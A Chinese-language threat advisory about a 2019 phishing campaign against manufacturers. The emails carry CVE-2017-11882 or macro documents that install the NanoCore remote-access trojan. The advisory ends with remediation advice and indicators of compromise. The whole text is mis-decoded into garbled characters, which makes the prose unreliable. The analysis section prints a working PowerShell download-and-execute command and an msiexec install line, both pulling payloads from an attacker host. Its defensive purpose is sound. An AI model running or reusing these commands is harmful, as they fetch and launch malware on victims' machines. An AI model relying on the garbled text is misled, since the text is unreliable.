SectorH01¹¥»÷×éÖ¯´¹µöÓʼþÊÂÎñ°²È«¹«¸æ
°ä²¼¹¦·ò 2019-09-22ÊÂÎñ²¼¾°
½üÆÚ¼ì²âµ½SectorH01¹¥»÷×éÖ¯¡°ÉÌóÐÅ¡±´¹µöÓʼþ¹¥»÷ÔÚ9Ô³öÏÖÐÂÒ»ÂÖÔö³¤¡£¡£¡£¡£¡£¡£¡£¡£ÔÚÕâ´Î¹¥»÷ÖУ¬£¬£¬£¬£¬£¬ºÚ¿Í¾«ÐÄ»ú¹ØµÄ´øÓÐoffice¹«Ê½±à×ëÆ÷·ì϶CVE-2017-11882»òºê´úÂëµÄ¶ñÒâÎĵµ£¬£¬£¬£¬£¬£¬½«Æä×÷Ϊ¸½¼þÅúÁ¿·¢ËÍÖÁ±íóÐÐÒµÆóÒµÓÊÏäÖУ¬£¬£¬£¬£¬£¬ÔÚÆä´ò¿ªÎĵµÖÐÕкóÖ²ÈëÔ¶¿ØÄ¾ÂíNanoCore½øÐлúÃÜÐÅÏ¢ÇÔÈ¡ºÍÔ¶³Ì½ÚÔ죬£¬£¬£¬£¬£¬±¾´Î¹¥»÷¶¥·åʱÆÚÿÌì³É¹¦Í¶µÝ³¬3000¸öÓʼþµØÖ·¡£¡£¡£¡£¡£¡£¡£¡£
ÊÂÎñÃèÊö
ƾ¾Ýͳ¼ÆÊý¾Ý£¬£¬£¬£¬£¬£¬Óг¬¹ý1000¼ÒÆóÒµÊܵ½Õâ´Î¹¥»÷Ó°Ï죬£¬£¬£¬£¬£¬ÆäÖнüÒ»°ëÒÔÉÏÉ¢²¼Ôڹ㶫¡¢½ËÕ¡¢Õ㽺ÍÉϺ£Ëĵأ¬£¬£¬£¬£¬£¬ÆäÖй㶫ռ±È³¬¹ý30%¡£¡£¡£¡£¡£¡£¡£¡£³ö¸ñÊǹ㶫Àö½ºÍººÖÐÓÉÓÚÔì×÷ÒµºÍ±íóÐÐÒµÃܼ¯£¬£¬£¬£¬£¬£¬³ÉΪ±¾´Î¹¥»÷Êܺ¦×îÑϳÁµÄÇøÓò¡£¡£¡£¡£¡£¡£¡£¡£
´ÓÐÐҵɢ²¼À´¿´£¬£¬£¬£¬£¬£¬¡°ÉÌóÐÅ¡±¹¥»÷Ö¸±êÖØÒª¼¯ÖÐÔÚ¹¤ÒµÔì×÷¼°ÒµÎñÐÐÒµ¡£¡£¡£¡£¡£¡£¡£¡£Í³¼ÆÊý¾ÝÏÔʾ£¬£¬£¬£¬£¬£¬±»¹¥»÷µÄ88%ΪÔì×÷Òµ£¬£¬£¬£¬£¬£¬Ôü×Ò12%ÊÇÓëÔì×÷ÒµÌṩÓйØÁªµÄÏúÊÛ¡¢ÔËÊä¡¢ÉÌÎñ·þÎñÐÐÒµ¡£¡£¡£¡£¡£¡£¡£¡£
ÊÂÎñ·ÖÎö
´¹µöÓʼþÖØÒªÍ¨¹ýαÔìÒÔÏ·¢¼þÓÊÏä½øÐз¢ËÍ£¬£¬£¬£¬£¬£¬ÆäÖÐʹÓÃ×î¶àµÄΪ
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
ÒÔÆäÖÐÒ»·âÓʼþΪÀý£¬£¬£¬£¬£¬£¬´ÓÓʼþÍ·²¿ÐÅÏ¢ÖÐÄܹ»¿´µ½·¢¼þ±¨´ð¡°Keith Ward/SDG /UK¡±£¬£¬£¬£¬£¬£¬·¢¼þÓÊÏäµØÖ·Îªkieth@sdgtrading.co.uk¡£¡£¡£¡£¡£¡£¡£¡£sdgtradingÊÇÒ»¼Ò×ܲ¿Î»ÓÚÓ¢¹úµÄ½ø³ö¿ÚÒµÎñ¹«Ë¾£¬£¬£¬£¬£¬£¬Ä¿Ç°´ò¿ª¸Ã¹«Ë¾¹Ù·½ÍøÕ¾Äܹ»Õý³£½Ó¼û¡£¡£¡£¡£¡£¡£¡£¡£
ÒµÎñ¹«Ë¾ÏúÊÛÈËÔ±ÐÅÏ¢
´¹µöÓʼþ
¡°¶©¹º¡±¡¢¡°¼ÛÖµ¡±¡¢¡°¼ÛÄ¿±í¡±¡¢¡°ÏúÊÛǰÌᡱ¡¢¡°ÕÛ¿Û¡±¡¢¡°×°ÔËÈÕÆÚ¡±¡¢¡°²É¹º¹æ¸ñ¡±µÈ¡£¡£¡£¡£¡£¡£¡£¡£
ÓʼþÖл¹Ö¸³öÓʼþ¸½¼þÖÐÔ̺¬¡°ÏëÒª²É¹ºµÄ²úÆ·Ìõ¿î¡±Îĵµ£¬£¬£¬£¬£¬£¬ÇëÔĶÁºó½øÐлظ´£¬£¬£¬£¬£¬£¬²¿ÃÅÎĵµÃûÈçÏ£º
RFQ015770082.doc
·ÖÎö·¢ÏÖ£¬£¬£¬£¬£¬£¬¸½¼þÎĵµÖÐÔ̺¬Office¹«Ê½±à×ëÆ÷·ì϶CVE-2017-11882ÀûÓôúÂë»ò¶ñÒâºê´úÂ룬£¬£¬£¬£¬£¬¾¹ý·ì϶¹¥»÷»òºê´úÂëÖ´Ðйý³Ì£¬£¬£¬£¬£¬£¬»á´¥·¢ÓÃÓÚÏÂÔØÄ¾ÂíµÄPowershellºÅÁîÖ´ÐУ¬£¬£¬£¬£¬£¬½øÒ»²½ÏÂÔØÄ¾Âí£º
'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'
³ýÁËÀûÓÃPowershell£¬£¬£¬£¬£¬£¬»¹Óв¿ÃŹ¥»÷ÖÐʹÓÃWindows×°Ö÷¨Ê½(msiexec.exe)×°ÖÃMSI°üÎļþ½øÐÐľÂíÏÂÔØ£º
msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi
´ÓĿǰ²¶»ñµ½µÄ¹¥»÷ÎĵµÖÐÎÒÃÇ·¢ÏÖÓÐÒÔÏÂľÂíÏÂÔØµØÖ·£º
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
Ô¶¿ØÄ¾Âí
±»ÏÂÔØÖ²ÈëµÄÏÖʵÉÏÊǵľ¹ý»ìºÏµÄÔ¶¿ØÄ¾ÂíNanoCore£¬£¬£¬£¬£¬£¬NanoCoreÊÇʹÓÃ.Net˵»°±àдµÄÖ°ÄÜ׳´óµÄÔ¶³Ì½Ó¼û½ÚÔìľÂí£¨RAT£©£¬£¬£¬£¬£¬£¬Äܹ»ÔÚÖ¸±êÖ÷»úÉϽøÐÐÎļþ²Ù×÷£¬£¬£¬£¬£¬£¬ÆÁÄ»½ÚÔ죬£¬£¬£¬£¬£¬ÔËÐÐÖ¸¶¨·¨Ê½£¬£¬£¬£¬£¬£¬»¹Ö§³Ö²å¼þÀ©´óÖ°ÄÜ£¬£¬£¬£¬£¬£¬±»Ï°È¾NanoCoreľÂíµÄµçÄÔ»á³öÏÖÑϳÁÐÅϢй¶£¬£¬£¬£¬£¬£¬¹¥»÷Õß»¹Äܹ»ÀûÓÃÖж¾µçÄÔÎªÌø°å£¬£¬£¬£¬£¬£¬¶ÔÖ¸±êÍøÂç³ÖÐø½øÐÐÉøÈëÈëÇÖ¡£¡£¡£¡£¡£¡£¡£¡£
Ö÷ÌâÄ£¿£¿£¿£¿£¿£¿é±»¼ÓÃܺóÒÔλͼÌåʽ±£ÁôÔÚ×ÊÔ´Îļþ
Ⱥ·¢Èí¼þ
ÎÒÃÇÏÂÔØ¸ÃÈí¼þ£¬£¬£¬£¬£¬£¬²¢½øÐÐ×¢²áºÍÊÔÓᣡ£¡£¡£¡£¡£¡£¡£Æ¾¾ÝÆä½çÃæÕ¹Ê¾µÄÖ°ÄÜ£¬£¬£¬£¬£¬£¬Ö»Ðè±àдºÃÓʼþÄÚÈÝ(ËÁÒâÌîд·¢¼þÈËÐÕÃû)¡¢ÅúÁ¿Ôö³¤ÊÕ¼þÈ˵ØÖ·¡¢µã»÷¡°ÆðͷȺ·¢¡±Èý²½£¬£¬£¬£¬£¬£¬¼´¿É½«Óʼþ¼±¾ç·¢ËÍÖÁ´óÅúµÄÖ¸±êÓÊÏäÖÓ×£¡£¡£¡£¡£¡£¡£¡£
¸ÃÈí¼þ»¹ÓÐÒ»¸ö³ÁÒªµÄÖ°ÄÜÊÇ£¬£¬£¬£¬£¬£¬Ö§³Ö´ÓÖ¸¶¨ÍøÕ¾²É¼¯Ö¸±êÓÊÏä¡£¡£¡£¡£¡£¡£¡£¡£¸ÃÖ°ÄÜÒ³ÃæÄ¬ÈϵÄÔ´ÍøÕ¾µØÖ·Îªhttp[:]//www.****.biz/¡£¡£¡£¡£¡£¡£¡£¡£ÎÒÃdz¢ÊÔʹÓøÃÍøÕ¾½øÐÐÓÊÏä²É¼¯£¬£¬£¬£¬£¬£¬ÔÚ10·ÖÖÓÖ®ÄÚÄܹ»²É¼¯µ½½ü800¸öÓÊÏ䵨ַ£¬£¬£¬£¬£¬£¬»»ËãºóÒ»¸öÓ×ʱ֮ÄÚÄܹ»²É¼¯µ½5000¸öÓÊÏ䣬£¬£¬£¬£¬£¬¶øÕâЩ±»²É¼¯µ½µÄÓÊÏä¶¼´æÔÚ±»¹¥»÷µÄ¿ÉÄÜ¡£¡£¡£¡£¡£¡£¡£¡£
Äܹ»¿´µ½Õâ¸öĬÈϵÄÓÊÏä²É¼¯ÍøÕ¾¡°**Íø¡±(www.*****.biz)ÊÇÒ»¸öÒµÎñÐÅÏ¢°ä²¼Æ½Ì¨£¬£¬£¬£¬£¬£¬´óÁ¿³§ÉÌ(»úе¡¢»¯¹¤¡¢µçÆø¡¢ÄÜÔ´¡¢ÒÇÆ÷µÈÐÐÒµ)ÔÚ¸ÃÍøÕ¾Éϰ䲼µÈ¸÷Àà²úÆ·µÄ¹©¸ø»òÇó¹ºÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£¡£¶øÃ¿Ò»ÌõÐÅÏ¢³ÇÊи½´ø³§É̵ĵ绰¡¢ÓʱࡢÓÊÏäµÈÁªÏµ·½Ê½£¬£¬£¬£¬£¬£¬¡°****ÓʼþȺ·¢Æ÷¡¹ØýÊÇ´ÓÕâЩÐÅÏ¢ÖлñÈ¡ÁË´óÁ¿µÄÓÊÏ䵨ַ¡£¡£¡£¡£¡£¡£¡£¡£
¹¥»÷˼·
´ÓÒÔϼ¸¸ö½Ç¶È£¬£¬£¬£¬£¬£¬ÎÒÃÇÒÔΪºÚ¿ÍʹÓÃÁËÓʼþȺ·¢Èí¼þ¡°****ÓʼþȺ·¢Æ÷¡±½øÐи¨Öú¹¥»÷£º
2¡¢Êܺ¦ÆóÒ·àÐÍÓë¡°****ÓʼþȺ·¢Æ÷¡±Ä¬Èϲɼ¯ÓÊÏäÀàÐÍÒ»ÖÂ(¹¤ÒµÆ·ÒµÎñ¹«Ë¾)£»£»£»£»£»£»£»£»
3¡¢¹¥»÷µÄÓ°ÏìÁìÓòÓë¸ÃÈí¼þµÄ²É¼¯ÄÜÁ¦ÎǺÏ(Êܺ¦ÓÊÏäÔ¼3000¸ö/ÈÕ & Èí¼þµÄ²É¼¯ÄÜÁ¦Ô¼5000¸ö/Ó×ʱ)¡£¡£¡£¡£¡£¡£¡£¡£
´§Ä¦ºÚ¿ÍÖ´Ðй¥»÷µÄ˼·ÈçÏ£º
1¡¢ºÚ¿ÍÏÂÔØÓʼþȺ·¢Èí¼þ£»£»£»£»£»£»£»£»
2¡¢»ú¹Ø´øÓÐCVE-2017-11882·ì϶ÀûÓÃ(»òÕߺê´úÂë)µÄoffice¶ñÒâÎļþ£»£»£»£»£»£»£»£»
3¡¢Ê¹ÓÃ****ÓʼþȺ·¢Æ÷´ÓÒµÎñ·ÖÀàÐÅÏ¢ÍøÕ¾ÅúÁ¿²É¼¯Ö¸±êÓÊÏ䵨ַ£»£»£»£»£»£»£»£»
4¡¢Ê¹ÓóﱸºÃµÄ¶ñÒâÎĵµ×÷Ϊ¸½¼þ£¬£¬£¬£¬£¬£¬»ú¹Ø´¹µöÓʼþ²¢ÅúÁ¿·¢ËÍ£»£»£»£»£»£»£»£»
5¡¢ÆÚ´ýÊÕ¼þÈË´ò¿ª¸½¼þ²¢ÖÐÕУ¬£¬£¬£¬£¬£¬Í¨¹ýÔ¶¿ØÄ¾ÂíNanoCore¶ÔÖ¸±ê½øÐÐÔ¶³Ì½ÚÔì¡£¡£¡£¡£¡£¡£¡£¡£
×ܽá
ÔÚÕâ´Î¹¥»÷ÊÂÎñÖÐÄܹ»·¢ÏÖ£¬£¬£¬£¬£¬£¬ºÚ¿ÍÓë»Ò²ú´ÓÒµÈËÔ±³öÏÖÁ˽»¼¯¡£¡£¡£¡£¡£¡£¡£¡£»£»£»£»£»£»£»£»Ò²úÈËÔ±¿ª·¢³öÓʼþȺ·¢¹¤¾ß£¬£¬£¬£¬£¬£¬¹¤¾ß¿ÉÕë¶ÔÍøÕ¾ÉϵĹ«¿ªÓÊÏä½øÐÐÅÀÈ¡£¡£¡£¡£¡£¡£¡£¡£¬£¬£¬£¬£¬£¬¿ÉÀûÓûñÈ¡µ½µÄÓÊÏä½øÐÐÅúÁ¿Èº·¢Óʼþ¡£¡£¡£¡£¡£¡£¡£¡£¹¤¾ßÔÚÆä×¢²áµÄ¡°¹ÙÍø¡±ÉϽøÐй«¿ªÊÛÂô£¬£¬£¬£¬£¬£¬Ê¹ÓÃ×¢Ã÷ÖÓ×°ÕýÒ塱µØÌáµ½¡°½öÓÃÓÚÕý¹æÓʼþÓªÏú£¬£¬£¬£¬£¬£¬ÀÄÓÃÕߺó¹ûµÃÒ⡱¡£¡£¡£¡£¡£¡£¡£¡£µ«¹¤¾ßÒ»µ©ÊÛ³ö£¬£¬£¬£¬£¬£¬±ãÄÑÒÔ±£Õϱ»ÓÃÓںϷ¨Óô¦¡£¡£¡£¡£¡£¡£¡£¡£
¶øºÚ¿Í»ñµÃ´ËÈí¼þºó£¬£¬£¬£¬£¬£¬½«ÆäÄÉÈë¹¥»÷±øÆ÷ÖеÄÒ»Ô±¡£¡£¡£¡£¡£¡£¡£¡£Ëæºó£¬£¬£¬£¬£¬£¬Ö»Ðè±àдºÃľÂí£¬£¬£¬£¬£¬£¬»ú¹Ø´¹µöÓʼþ£¬£¬£¬£¬£¬£¬¾ÍÄܹ»ÀûÓøù¤¾ß½«´¹µöÓʼþ×Ô¶¯»¯¡¢´óÅúÁ¿µØ·¢ËÍÖÁÆóÒµµÄÓйØÓÊÏäÖÓ×£¡£¡£¡£¡£¡£¡£¡£
½¨¸´½¨Òé
1¡¢ÆóÒµÓÊÏäÍø¹Ü½«ÒÔÏ·¢¼þÓÊÏäÉèÖÃΪºÚÃûµ¥
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
2¡¢²»Òª´ò¿ª²»Ã÷ÆðÔ´µÄÓʼþ¸½¼þ£¬£¬£¬£¬£¬£¬¶ÔÓÚ¸½¼þÖеÄÎļþÒªÉóÉ÷ÔËÐУ¬£¬£¬£¬£¬£¬Èç·¢ÏÖÓо籾»òÆäËû¿ÉÖ´ÐÐÎļþ¿ÉÏÈʹÓÃɱ¶¾Èí¼þ½øÐÐɨÃ裻£»£»£»£»£»£»£»
3¡¢Éý¼¶officeϵÁÐÈí¼þµ½×îа汾£¬£¬£¬£¬£¬£¬ÊµÊ±½¨¸´office·¨Ê½·ì϶£¬£¬£¬£¬£¬£¬²»ÒªÇáÒ×ÔËÐв»³ÉÐÅÎĵµÖеĺꣻ£»£»£»£»£»£»£»
4¡¢ÍƼö²¿ÊðÖն˰²È«ÖÎÀíϵͳ·ÀÓù²¡¶¾Ä¾Âí¹¥»÷£»£»£»£»£»£»£»£»
5¡¢Ê¹ÓÃÈëÇÖ¼ì²âϵͳ¼ì²âδ֪ºÚ¿ÍµÄ¸÷Àà¿ÉÒɹ¥»÷ÐÐΪ¡£¡£¡£¡£¡£¡£¡£¡£
IOC
ÓÊÏä
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
Óʼþ¸½¼þ
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905
a9958884c16f17c2c9e4d75f92117352
NanaCoreľÂí
453a235ad5ea7055f2af2c51c95a5bb2
ÓòÃû
oppofile.duckdns.org
URL
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
²Î¿¼Á´½Ó


¾©¹«Íø°²±¸11010802024551ºÅ